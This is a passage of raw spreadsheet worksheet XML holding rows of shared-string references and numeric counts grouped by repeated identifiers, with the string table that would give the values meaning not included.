        <v>16229</v>
      </c>
      <c r="B13250" t="s">
        <v>16219</v>
      </c>
      <c r="C13250">
        <v>0</v>
      </c>
      <c r="D13250">
        <v>5093</v>
      </c>
    </row>
    <row r="13251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13251" t="s">
        <v>16230</v>
      </c>
      <c r="B13251" t="s">
        <v>16220</v>
      </c>
      <c r="C13251">
        <v>0</v>
      </c>
      <c r="D13251">
        <v>5093</v>
      </c>
    </row>
    <row r="13252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13252" t="s">
        <v>16229</v>
      </c>
      <c r="B13252" t="s">
        <v>16221</v>
      </c>
      <c r="C13252">
        <v>4</v>
      </c>
      <c r="D13252">
        <v>5093</v>
      </c>
    </row>
    <row r="13253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13253" t="s">
        <v>16230</v>
      </c>
      <c r="B13253" t="s">
        <v>16222</v>
      </c>
      <c r="C13253">
        <v>4</v>
      </c>
      <c r="D13253">
        <v>5093</v>
      </c>
    </row>
    <row r="13254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13254" t="s">
        <v>16223</v>
      </c>
      <c r="B13254" t="s">
        <v>16223</v>
      </c>
      <c r="C13254">
        <v>100</v>
      </c>
      <c r="D13254">
        <v>5093</v>
      </c>
    </row>
    <row r="13255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13255" t="s">
        <v>16224</v>
      </c>
      <c r="B13255" t="s">
        <v>16224</v>
      </c>
      <c r="C13255">
        <v>0</v>
      </c>
      <c r="D13255">
        <v>5093</v>
      </c>
    </row>
    <row r="13256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13256" t="s">
        <v>16228</v>
      </c>
      <c r="B13256" t="s">
        <v>16211</v>
      </c>
      <c r="C13256">
        <v>1</v>
      </c>
      <c r="D13256">
        <v>19</v>
      </c>
    </row>
    <row r="13257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13257" t="s">
        <v>16231</v>
      </c>
      <c r="B13257" t="s">
        <v>16212</v>
      </c>
      <c r="C13257">
        <v>0</v>
      </c>
      <c r="D13257">
        <v>19</v>
      </c>
    </row>
    <row r="13258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13258" t="s">
        <v>16228</v>
      </c>
      <c r="B13258" t="s">
        <v>16213</v>
      </c>
      <c r="C13258">
        <v>0</v>
      </c>
      <c r="D13258">
        <v>19</v>
      </c>
    </row>
    <row r="13259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13259" t="s">
        <v>16231</v>
      </c>
      <c r="B13259" t="s">
        <v>16214</v>
      </c>
      <c r="C13259">
        <v>0</v>
      </c>
      <c r="D13259">
        <v>19</v>
      </c>
    </row>
    <row r="13260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13260" t="s">
        <v>16228</v>
      </c>
      <c r="B13260" t="s">
        <v>16215</v>
      </c>
      <c r="C13260">
        <v>5</v>
      </c>
      <c r="D13260">
        <v>19</v>
      </c>
    </row>
    <row r="13261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13261" t="s">
        <v>16231</v>
      </c>
      <c r="B13261" t="s">
        <v>16216</v>
      </c>
      <c r="C13261">
        <v>23</v>
      </c>
      <c r="D13261">
        <v>19</v>
      </c>
    </row>
    <row r="13262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13262" t="s">
        <v>16228</v>
      </c>
      <c r="B13262" t="s">
        <v>16217</v>
      </c>
      <c r="C13262">
        <v>20</v>
      </c>
      <c r="D13262">
        <v>19</v>
      </c>
    </row>
    <row r="13263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13263" t="s">
        <v>16231</v>
      </c>
      <c r="B13263" t="s">
        <v>16218</v>
      </c>
      <c r="C13263">
        <v>6</v>
      </c>
      <c r="D13263">
        <v>19</v>
      </c>
    </row>
    <row r="13264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13264" t="s">
        <v>16229</v>
      </c>
      <c r="B13264" t="s">
        <v>16219</v>
      </c>
      <c r="C13264">
        <v>2</v>
      </c>
      <c r="D13264">
        <v>19</v>
      </c>
    </row>
    <row r="13265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13265" t="s">
        <v>16230</v>
      </c>
      <c r="B13265" t="s">
        <v>16220</v>
      </c>
      <c r="C13265">
        <v>21</v>
      </c>
      <c r="D13265">
        <v>19</v>
      </c>
    </row>
    <row r="13266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13266" t="s">
        <v>16229</v>
      </c>
      <c r="B13266" t="s">
        <v>16221</v>
      </c>
      <c r="C13266">
        <v>22</v>
      </c>
      <c r="D13266">
        <v>19</v>
      </c>
    </row>
    <row r="13267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13267" t="s">
        <v>16230</v>
      </c>
      <c r="B13267" t="s">
        <v>16222</v>
      </c>
      <c r="C13267">
        <v>437</v>
      </c>
      <c r="D13267">
        <v>19</v>
      </c>
    </row>
    <row r="13268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13268" t="s">
        <v>16223</v>
      </c>
      <c r="B13268" t="s">
        <v>16223</v>
      </c>
      <c r="C13268">
        <v>25</v>
      </c>
      <c r="D13268">
        <v>19</v>
      </c>
    </row>
    <row r="13269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13269" t="s">
        <v>16224</v>
      </c>
      <c r="B13269" t="s">
        <v>16224</v>
      </c>
      <c r="C13269">
        <v>1</v>
      </c>
      <c r="D13269">
        <v>19</v>
      </c>
    </row>
    <row r="13270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13270" t="s">
        <v>16228</v>
      </c>
      <c r="B13270" t="s">
        <v>16211</v>
      </c>
      <c r="C13270">
        <v>0</v>
      </c>
      <c r="D13270">
        <v>34</v>
      </c>
    </row>
    <row r="13271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13271" t="s">
        <v>16231</v>
      </c>
      <c r="B13271" t="s">
        <v>16212</v>
      </c>
      <c r="C13271">
        <v>0</v>
      </c>
      <c r="D13271">
        <v>34</v>
      </c>
    </row>
    <row r="13272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13272" t="s">
        <v>16228</v>
      </c>
      <c r="B13272" t="s">
        <v>16213</v>
      </c>
      <c r="C13272">
        <v>0</v>
      </c>
      <c r="D13272">
        <v>34</v>
      </c>
    </row>
    <row r="13273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13273" t="s">
        <v>16231</v>
      </c>
      <c r="B13273" t="s">
        <v>16214</v>
      </c>
      <c r="C13273">
        <v>0</v>
      </c>
      <c r="D13273">
        <v>34</v>
      </c>
    </row>
    <row r="13274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13274" t="s">
        <v>16228</v>
      </c>
      <c r="B13274" t="s">
        <v>16215</v>
      </c>
      <c r="C13274">
        <v>2</v>
      </c>
      <c r="D13274">
        <v>34</v>
      </c>
    </row>
    <row r="13275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13275" t="s">
        <v>16231</v>
      </c>
      <c r="B13275" t="s">
        <v>16216</v>
      </c>
      <c r="C13275">
        <v>4</v>
      </c>
      <c r="D13275">
        <v>34</v>
      </c>
    </row>
    <row r="13276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13276" t="s">
        <v>16228</v>
      </c>
      <c r="B13276" t="s">
        <v>16217</v>
      </c>
      <c r="C13276">
        <v>2</v>
      </c>
      <c r="D13276">
        <v>34</v>
      </c>
    </row>
    <row r="13277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13277" t="s">
        <v>16231</v>
      </c>
      <c r="B13277" t="s">
        <v>16218</v>
      </c>
      <c r="C13277">
        <v>0</v>
      </c>
      <c r="D13277">
        <v>34</v>
      </c>
    </row>
    <row r="13278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13278" t="s">
        <v>16229</v>
      </c>
      <c r="B13278" t="s">
        <v>16219</v>
      </c>
      <c r="C13278">
        <v>0</v>
      </c>
      <c r="D13278">
        <v>34</v>
      </c>
    </row>
    <row r="13279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13279" t="s">
        <v>16230</v>
      </c>
      <c r="B13279" t="s">
        <v>16220</v>
      </c>
      <c r="C13279">
        <v>1</v>
      </c>
      <c r="D13279">
        <v>34</v>
      </c>
    </row>
    <row r="13280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13280" t="s">
        <v>16229</v>
      </c>
      <c r="B13280" t="s">
        <v>16221</v>
      </c>
      <c r="C13280">
        <v>5</v>
      </c>
      <c r="D13280">
        <v>34</v>
      </c>
    </row>
    <row r="13281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13281" t="s">
        <v>16230</v>
      </c>
      <c r="B13281" t="s">
        <v>16222</v>
      </c>
      <c r="C13281">
        <v>6</v>
      </c>
      <c r="D13281">
        <v>34</v>
      </c>
    </row>
    <row r="13282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13282" t="s">
        <v>16223</v>
      </c>
      <c r="B13282" t="s">
        <v>16223</v>
      </c>
      <c r="C13282">
        <v>25</v>
      </c>
      <c r="D13282">
        <v>34</v>
      </c>
    </row>
    <row r="13283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13283" t="s">
        <v>16224</v>
      </c>
      <c r="B13283" t="s">
        <v>16224</v>
      </c>
      <c r="C13283">
        <v>0</v>
      </c>
      <c r="D13283">
        <v>34</v>
      </c>
    </row>
    <row r="13284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13284" t="s">
        <v>16228</v>
      </c>
      <c r="B13284" t="s">
        <v>16211</v>
      </c>
      <c r="C13284">
        <v>0</v>
      </c>
      <c r="D13284">
        <v>1365</v>
      </c>
    </row>
    <row r="13285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13285" t="s">
        <v>16231</v>
      </c>
      <c r="B13285" t="s">
        <v>16212</v>
      </c>
      <c r="C13285">
        <v>0</v>
      </c>
      <c r="D13285">
        <v>1365</v>
      </c>
    </row>
    <row r="13286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13286" t="s">
        <v>16228</v>
      </c>
      <c r="B13286" t="s">
        <v>16213</v>
      </c>
      <c r="C13286">
        <v>0</v>
      </c>
      <c r="D13286">
        <v>1365</v>
      </c>
    </row>
    <row r="13287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13287" t="s">
        <v>16231</v>
      </c>
      <c r="B13287" t="s">
        <v>16214</v>
      </c>
      <c r="C13287">
        <v>0</v>
      </c>
      <c r="D13287">
        <v>1365</v>
      </c>
    </row>
    <row r="13288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13288" t="s">
        <v>16228</v>
      </c>
      <c r="B13288" t="s">
        <v>16215</v>
      </c>
      <c r="C13288">
        <v>1</v>
      </c>
      <c r="D13288">
        <v>1365</v>
      </c>
    </row>
    <row r="13289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13289" t="s">
        <v>16231</v>
      </c>
      <c r="B13289" t="s">
        <v>16216</v>
      </c>
      <c r="C13289">
        <v>2</v>
      </c>
      <c r="D13289">
        <v>1365</v>
      </c>
    </row>
    <row r="13290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13290" t="s">
        <v>16228</v>
      </c>
      <c r="B13290" t="s">
        <v>16217</v>
      </c>
      <c r="C13290">
        <v>12</v>
      </c>
      <c r="D13290">
        <v>1365</v>
      </c>
    </row>
    <row r="13291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13291" t="s">
        <v>16231</v>
      </c>
      <c r="B13291" t="s">
        <v>16218</v>
      </c>
      <c r="C13291">
        <v>13</v>
      </c>
      <c r="D13291">
        <v>1365</v>
      </c>
    </row>
    <row r="13292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13292" t="s">
        <v>16229</v>
      </c>
      <c r="B13292" t="s">
        <v>16219</v>
      </c>
      <c r="C13292">
        <v>0</v>
      </c>
      <c r="D13292">
        <v>1365</v>
      </c>
    </row>
    <row r="13293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13293" t="s">
        <v>16230</v>
      </c>
      <c r="B13293" t="s">
        <v>16220</v>
      </c>
      <c r="C13293">
        <v>0</v>
      </c>
      <c r="D13293">
        <v>1365</v>
      </c>
    </row>
    <row r="13294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13294" t="s">
        <v>16229</v>
      </c>
      <c r="B13294" t="s">
        <v>16221</v>
      </c>
      <c r="C13294">
        <v>0</v>
      </c>
      <c r="D13294">
        <v>1365</v>
      </c>
    </row>
    <row r="13295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13295" t="s">
        <v>16230</v>
      </c>
      <c r="B13295" t="s">
        <v>16222</v>
      </c>
      <c r="C13295">
        <v>0</v>
      </c>
      <c r="D13295">
        <v>1365</v>
      </c>
    </row>
    <row r="13296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13296" t="s">
        <v>16223</v>
      </c>
      <c r="B13296" t="s">
        <v>16223</v>
      </c>
      <c r="C13296">
        <v>26</v>
      </c>
      <c r="D13296">
        <v>1365</v>
      </c>
    </row>
    <row r="13297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13297" t="s">
        <v>16224</v>
      </c>
      <c r="B13297" t="s">
        <v>16224</v>
      </c>
      <c r="C13297">
        <v>1</v>
      </c>
      <c r="D13297">
        <v>1365</v>
      </c>
    </row>
    <row r="13298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13298" t="s">
        <v>16228</v>
      </c>
      <c r="B13298" t="s">
        <v>16211</v>
      </c>
      <c r="C13298">
        <v>0</v>
      </c>
      <c r="D13298">
        <v>5015</v>
      </c>
    </row>
    <row r="13299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13299" t="s">
        <v>16231</v>
      </c>
      <c r="B13299" t="s">
        <v>16212</v>
      </c>
      <c r="C13299">
        <v>0</v>
      </c>
      <c r="D13299">
        <v>5015</v>
      </c>
    </row>
    <row r="13300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13300" t="s">
        <v>16228</v>
      </c>
      <c r="B13300" t="s">
        <v>16213</v>
      </c>
      <c r="C13300">
        <v>0</v>
      </c>
      <c r="D13300">
        <v>5015</v>
      </c>
    </row>
    <row r="13301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13301" t="s">
        <v>16231</v>
      </c>
      <c r="B13301" t="s">
        <v>16214</v>
      </c>
      <c r="C13301">
        <v>0</v>
      </c>
      <c r="D13301">
        <v>5015</v>
      </c>
    </row>
    <row r="13302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13302" t="s">
        <v>16228</v>
      </c>
      <c r="B13302" t="s">
        <v>16215</v>
      </c>
      <c r="C13302">
        <v>0</v>
      </c>
      <c r="D13302">
        <v>5015</v>
      </c>
    </row>
    <row r="13303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13303" t="s">
        <v>16231</v>
      </c>
      <c r="B13303" t="s">
        <v>16216</v>
      </c>
      <c r="C13303">
        <v>1</v>
      </c>
      <c r="D13303">
        <v>5015</v>
      </c>
    </row>
    <row r="13304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13304" t="s">
        <v>16228</v>
      </c>
      <c r="B13304" t="s">
        <v>16217</v>
      </c>
      <c r="C13304">
        <v>0</v>
      </c>
      <c r="D13304">
        <v>5015</v>
      </c>
    </row>
    <row r="13305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13305" t="s">
        <v>16231</v>
      </c>
      <c r="B13305" t="s">
        <v>16218</v>
      </c>
      <c r="C13305">
        <v>3</v>
      </c>
      <c r="D13305">
        <v>5015</v>
      </c>
    </row>
    <row r="13306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13306" t="s">
        <v>16229</v>
      </c>
      <c r="B13306" t="s">
        <v>16219</v>
      </c>
      <c r="C13306">
        <v>0</v>
      </c>
      <c r="D13306">
        <v>5015</v>
      </c>
    </row>
    <row r="13307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13307" t="s">
        <v>16230</v>
      </c>
      <c r="B13307" t="s">
        <v>16220</v>
      </c>
      <c r="C13307">
        <v>0</v>
      </c>
      <c r="D13307">
        <v>5015</v>
      </c>
    </row>
    <row r="13308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13308" t="s">
        <v>16229</v>
      </c>
      <c r="B13308" t="s">
        <v>16221</v>
      </c>
      <c r="C13308">
        <v>0</v>
      </c>
      <c r="D13308">
        <v>5015</v>
      </c>
    </row>
    <row r="13309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13309" t="s">
        <v>16230</v>
      </c>
      <c r="B13309" t="s">
        <v>16222</v>
      </c>
      <c r="C13309">
        <v>0</v>
      </c>
      <c r="D13309">
        <v>5015</v>
      </c>
    </row>
    <row r="13310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13310" t="s">
        <v>16223</v>
      </c>
      <c r="B13310" t="s">
        <v>16223</v>
      </c>
      <c r="C13310">
        <v>0</v>
      </c>
      <c r="D13310">
        <v>5015</v>
      </c>
    </row>
    <row r="13311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13311" t="s">
        <v>16224</v>
      </c>
      <c r="B13311" t="s">
        <v>16224</v>
      </c>
      <c r="C13311">
        <v>7</v>
      </c>
      <c r="D13311">
        <v>5015</v>
      </c>
    </row>
    <row r="13312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13312" t="s">
        <v>16228</v>
      </c>
      <c r="B13312" t="s">
        <v>16211</v>
      </c>
      <c r="C13312">
        <v>0</v>
      </c>
      <c r="D13312">
        <v>966</v>
      </c>
    </row>
    <row r="13313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13313" t="s">
        <v>16231</v>
      </c>
      <c r="B13313" t="s">
        <v>16212</v>
      </c>
      <c r="C13313">
        <v>0</v>
      </c>
      <c r="D13313">
        <v>966</v>
      </c>
    </row>
    <row r="13314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13314" t="s">
        <v>16228</v>
      </c>
      <c r="B13314" t="s">
        <v>16213</v>
      </c>
      <c r="C13314">
        <v>0</v>
      </c>
      <c r="D13314">
        <v>966</v>
      </c>
    </row>
    <row r="13315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13315" t="s">
        <v>16231</v>
      </c>
      <c r="B13315" t="s">
        <v>16214</v>
      </c>
      <c r="C13315">
        <v>0</v>
      </c>
      <c r="D13315">
        <v>966</v>
      </c>
    </row>
    <row r="13316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13316" t="s">
        <v>16228</v>
      </c>
      <c r="B13316" t="s">
        <v>16215</v>
      </c>
      <c r="C13316">
        <v>4</v>
      </c>
      <c r="D13316">
        <v>966</v>
      </c>
    </row>
    <row r="13317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13317" t="s">
        <v>16231</v>
      </c>
      <c r="B13317" t="s">
        <v>16216</v>
      </c>
      <c r="C13317">
        <v>7</v>
      </c>
      <c r="D13317">
        <v>966</v>
      </c>
    </row>
    <row r="13318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13318" t="s">
        <v>16228</v>
      </c>
      <c r="B13318" t="s">
        <v>16217</v>
      </c>
      <c r="C13318">
        <v>51</v>
      </c>
      <c r="D13318">
        <v>966</v>
      </c>
    </row>
    <row r="13319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13319" t="s">
        <v>16231</v>
      </c>
      <c r="B13319" t="s">
        <v>16218</v>
      </c>
      <c r="C13319">
        <v>5</v>
      </c>
      <c r="D13319">
        <v>966</v>
      </c>
    </row>
    <row r="13320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13320" t="s">
        <v>16229</v>
      </c>
      <c r="B13320" t="s">
        <v>16219</v>
      </c>
      <c r="C13320">
        <v>0</v>
      </c>
      <c r="D13320">
        <v>966</v>
      </c>
    </row>
    <row r="13321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13321" t="s">
        <v>16230</v>
      </c>
      <c r="B13321" t="s">
        <v>16220</v>
      </c>
      <c r="C13321">
        <v>0</v>
      </c>
      <c r="D13321">
        <v>966</v>
      </c>
    </row>
    <row r="13322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13322" t="s">
        <v>16229</v>
      </c>
      <c r="B13322" t="s">
        <v>16221</v>
      </c>
      <c r="C13322">
        <v>0</v>
      </c>
      <c r="D13322">
        <v>966</v>
      </c>
    </row>
    <row r="13323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13323" t="s">
        <v>16230</v>
      </c>
      <c r="B13323" t="s">
        <v>16222</v>
      </c>
      <c r="C13323">
        <v>0</v>
      </c>
      <c r="D13323">
        <v>966</v>
      </c>
    </row>
    <row r="13324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13324" t="s">
        <v>16223</v>
      </c>
      <c r="B13324" t="s">
        <v>16223</v>
      </c>
      <c r="C13324">
        <v>7</v>
      </c>
      <c r="D13324">
        <v>966</v>
      </c>
    </row>
    <row r="13325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13325" t="s">
        <v>16224</v>
      </c>
      <c r="B13325" t="s">
        <v>16224</v>
      </c>
      <c r="C13325">
        <v>2</v>
      </c>
      <c r="D13325">
        <v>966</v>
      </c>
    </row>
    <row r="13326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13326" t="s">
        <v>16228</v>
      </c>
      <c r="B13326" t="s">
        <v>16211</v>
      </c>
      <c r="C13326">
        <v>0</v>
      </c>
      <c r="D13326">
        <v>1380</v>
      </c>
    </row>
    <row r="13327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13327" t="s">
        <v>16231</v>
      </c>
      <c r="B13327" t="s">
        <v>16212</v>
      </c>
      <c r="C13327">
        <v>0</v>
      </c>
      <c r="D13327">
        <v>1380</v>
      </c>
    </row>
    <row r="13328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13328" t="s">
        <v>16228</v>
      </c>
      <c r="B13328" t="s">
        <v>16213</v>
      </c>
      <c r="C13328">
        <v>0</v>
      </c>
      <c r="D13328">
        <v>1380</v>
      </c>
    </row>
    <row r="13329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13329" t="s">
        <v>16231</v>
      </c>
      <c r="B13329" t="s">
        <v>16214</v>
      </c>
      <c r="C13329">
        <v>0</v>
      </c>
      <c r="D13329">
        <v>1380</v>
      </c>
    </row>
    <row r="13330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13330" t="s">
        <v>16228</v>
      </c>
      <c r="B13330" t="s">
        <v>16215</v>
      </c>
      <c r="C13330">
        <v>0</v>
      </c>
      <c r="D13330">
        <v>1380</v>
      </c>
    </row>
    <row r="13331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13331" t="s">
        <v>16231</v>
      </c>
      <c r="B13331" t="s">
        <v>16216</v>
      </c>
      <c r="C13331">
        <v>1</v>
      </c>
      <c r="D13331">
        <v>1380</v>
      </c>
    </row>
    <row r="13332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13332" t="s">
        <v>16228</v>
      </c>
      <c r="B13332" t="s">
        <v>16217</v>
      </c>
      <c r="C13332">
        <v>0</v>
      </c>
      <c r="D13332">
        <v>1380</v>
      </c>
    </row>
    <row r="13333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13333" t="s">
        <v>16231</v>
      </c>
      <c r="B13333" t="s">
        <v>16218</v>
      </c>
      <c r="C13333">
        <v>14</v>
      </c>
      <c r="D13333">
        <v>1380</v>
      </c>
    </row>
    <row r="13334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13334" t="s">
        <v>16229</v>
      </c>
      <c r="B13334" t="s">
        <v>16219</v>
      </c>
      <c r="C13334">
        <v>0</v>
      </c>
      <c r="D13334">
        <v>1380</v>
      </c>
    </row>
    <row r="13335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13335" t="s">
        <v>16230</v>
      </c>
      <c r="B13335" t="s">
        <v>16220</v>
      </c>
      <c r="C13335">
        <v>0</v>
      </c>
      <c r="D13335">
        <v>1380</v>
      </c>
    </row>
    <row r="13336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13336" t="s">
        <v>16229</v>
      </c>
      <c r="B13336" t="s">
        <v>16221</v>
      </c>
      <c r="C13336">
        <v>0</v>
      </c>
      <c r="D13336">
        <v>1380</v>
      </c>
    </row>
    <row r="13337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13337" t="s">
        <v>16230</v>
      </c>
      <c r="B13337" t="s">
        <v>16222</v>
      </c>
      <c r="C13337">
        <v>0</v>
      </c>
      <c r="D13337">
        <v>1380</v>
      </c>
    </row>
    <row r="13338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13338" t="s">
        <v>16223</v>
      </c>
      <c r="B13338" t="s">
        <v>16223</v>
      </c>
      <c r="C13338">
        <v>4</v>
      </c>
      <c r="D13338">
        <v>1380</v>
      </c>
    </row>
    <row r="13339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13339" t="s">
        <v>16224</v>
      </c>
      <c r="B13339" t="s">
        <v>16224</v>
      </c>
      <c r="C13339">
        <v>2</v>
      </c>
      <c r="D13339">
        <v>1380</v>
      </c>
    </row>
    <row r="13340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13340" t="s">
        <v>16228</v>
      </c>
      <c r="B13340" t="s">
        <v>16211</v>
      </c>
      <c r="C13340">
        <v>0</v>
      </c>
      <c r="D13340">
        <v>5086</v>
      </c>
    </row>
    <row r="13341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13341" t="s">
        <v>16231</v>
      </c>
      <c r="B13341" t="s">
        <v>16212</v>
      </c>
      <c r="C13341">
        <v>0</v>
      </c>
      <c r="D13341">
        <v>5086</v>
      </c>
    </row>
    <row r="13342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13342" t="s">
        <v>16228</v>
      </c>
      <c r="B13342" t="s">
        <v>16213</v>
      </c>
      <c r="C13342">
        <v>0</v>
      </c>
      <c r="D13342">
        <v>5086</v>
      </c>
    </row>
    <row r="13343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13343" t="s">
        <v>16231</v>
      </c>
      <c r="B13343" t="s">
        <v>16214</v>
      </c>
      <c r="C13343">
        <v>0</v>
      </c>
      <c r="D13343">
        <v>5086</v>
      </c>
    </row>
    <row r="13344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13344" t="s">
        <v>16228</v>
      </c>
      <c r="B13344" t="s">
        <v>16215</v>
      </c>
      <c r="C13344">
        <v>2</v>
      </c>
      <c r="D13344">
        <v>5086</v>
      </c>
    </row>
    <row r="13345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13345" t="s">
        <v>16231</v>
      </c>
      <c r="B13345" t="s">
        <v>16216</v>
      </c>
      <c r="C13345">
        <v>1</v>
      </c>
      <c r="D13345">
        <v>5086</v>
      </c>
    </row>
    <row r="13346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13346" t="s">
        <v>16228</v>
      </c>
      <c r="B13346" t="s">
        <v>16217</v>
      </c>
      <c r="C13346">
        <v>0</v>
      </c>
      <c r="D13346">
        <v>5086</v>
      </c>
    </row>
    <row r="13347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13347" t="s">
        <v>16231</v>
      </c>
      <c r="B13347" t="s">
        <v>16218</v>
      </c>
      <c r="C13347">
        <v>0</v>
      </c>
      <c r="D13347">
        <v>5086</v>
      </c>
    </row>
    <row r="13348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13348" t="s">
        <v>16229</v>
      </c>
      <c r="B13348" t="s">
        <v>16219</v>
      </c>
      <c r="C13348">
        <v>0</v>
      </c>
      <c r="D13348">
        <v>5086</v>
      </c>
    </row>
    <row r="13349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13349" t="s">
        <v>16230</v>
      </c>
      <c r="B13349" t="s">
        <v>16220</v>
      </c>
      <c r="C13349">
        <v>0</v>
      </c>
      <c r="D13349">
        <v>5086</v>
      </c>
    </row>
    <row r="13350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13350" t="s">
        <v>16229</v>
      </c>
      <c r="B13350" t="s">
        <v>16221</v>
      </c>
      <c r="C13350">
        <v>10</v>
      </c>
      <c r="D13350">
        <v>5086</v>
      </c>
    </row>
    <row r="13351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13351" t="s">
        <v>16230</v>
      </c>
      <c r="B13351" t="s">
        <v>16222</v>
      </c>
      <c r="C13351">
        <v>0</v>
      </c>
      <c r="D13351">
        <v>5086</v>
      </c>
    </row>
    <row r="13352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13352" t="s">
        <v>16223</v>
      </c>
      <c r="B13352" t="s">
        <v>16223</v>
      </c>
      <c r="C13352">
        <v>30</v>
      </c>
      <c r="D13352">
        <v>5086</v>
      </c>
    </row>
    <row r="13353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13353" t="s">
        <v>16224</v>
      </c>
      <c r="B13353" t="s">
        <v>16224</v>
      </c>
      <c r="C13353">
        <v>1</v>
      </c>
      <c r="D13353">
        <v>5086</v>
      </c>
    </row>
    <row r="13354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13354" t="s">
        <v>16228</v>
      </c>
      <c r="B13354" t="s">
        <v>16211</v>
      </c>
      <c r="C13354">
        <v>0</v>
      </c>
      <c r="D13354">
        <v>5095</v>
      </c>
    </row>
    <row r="13355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13355" t="s">
        <v>16231</v>
      </c>
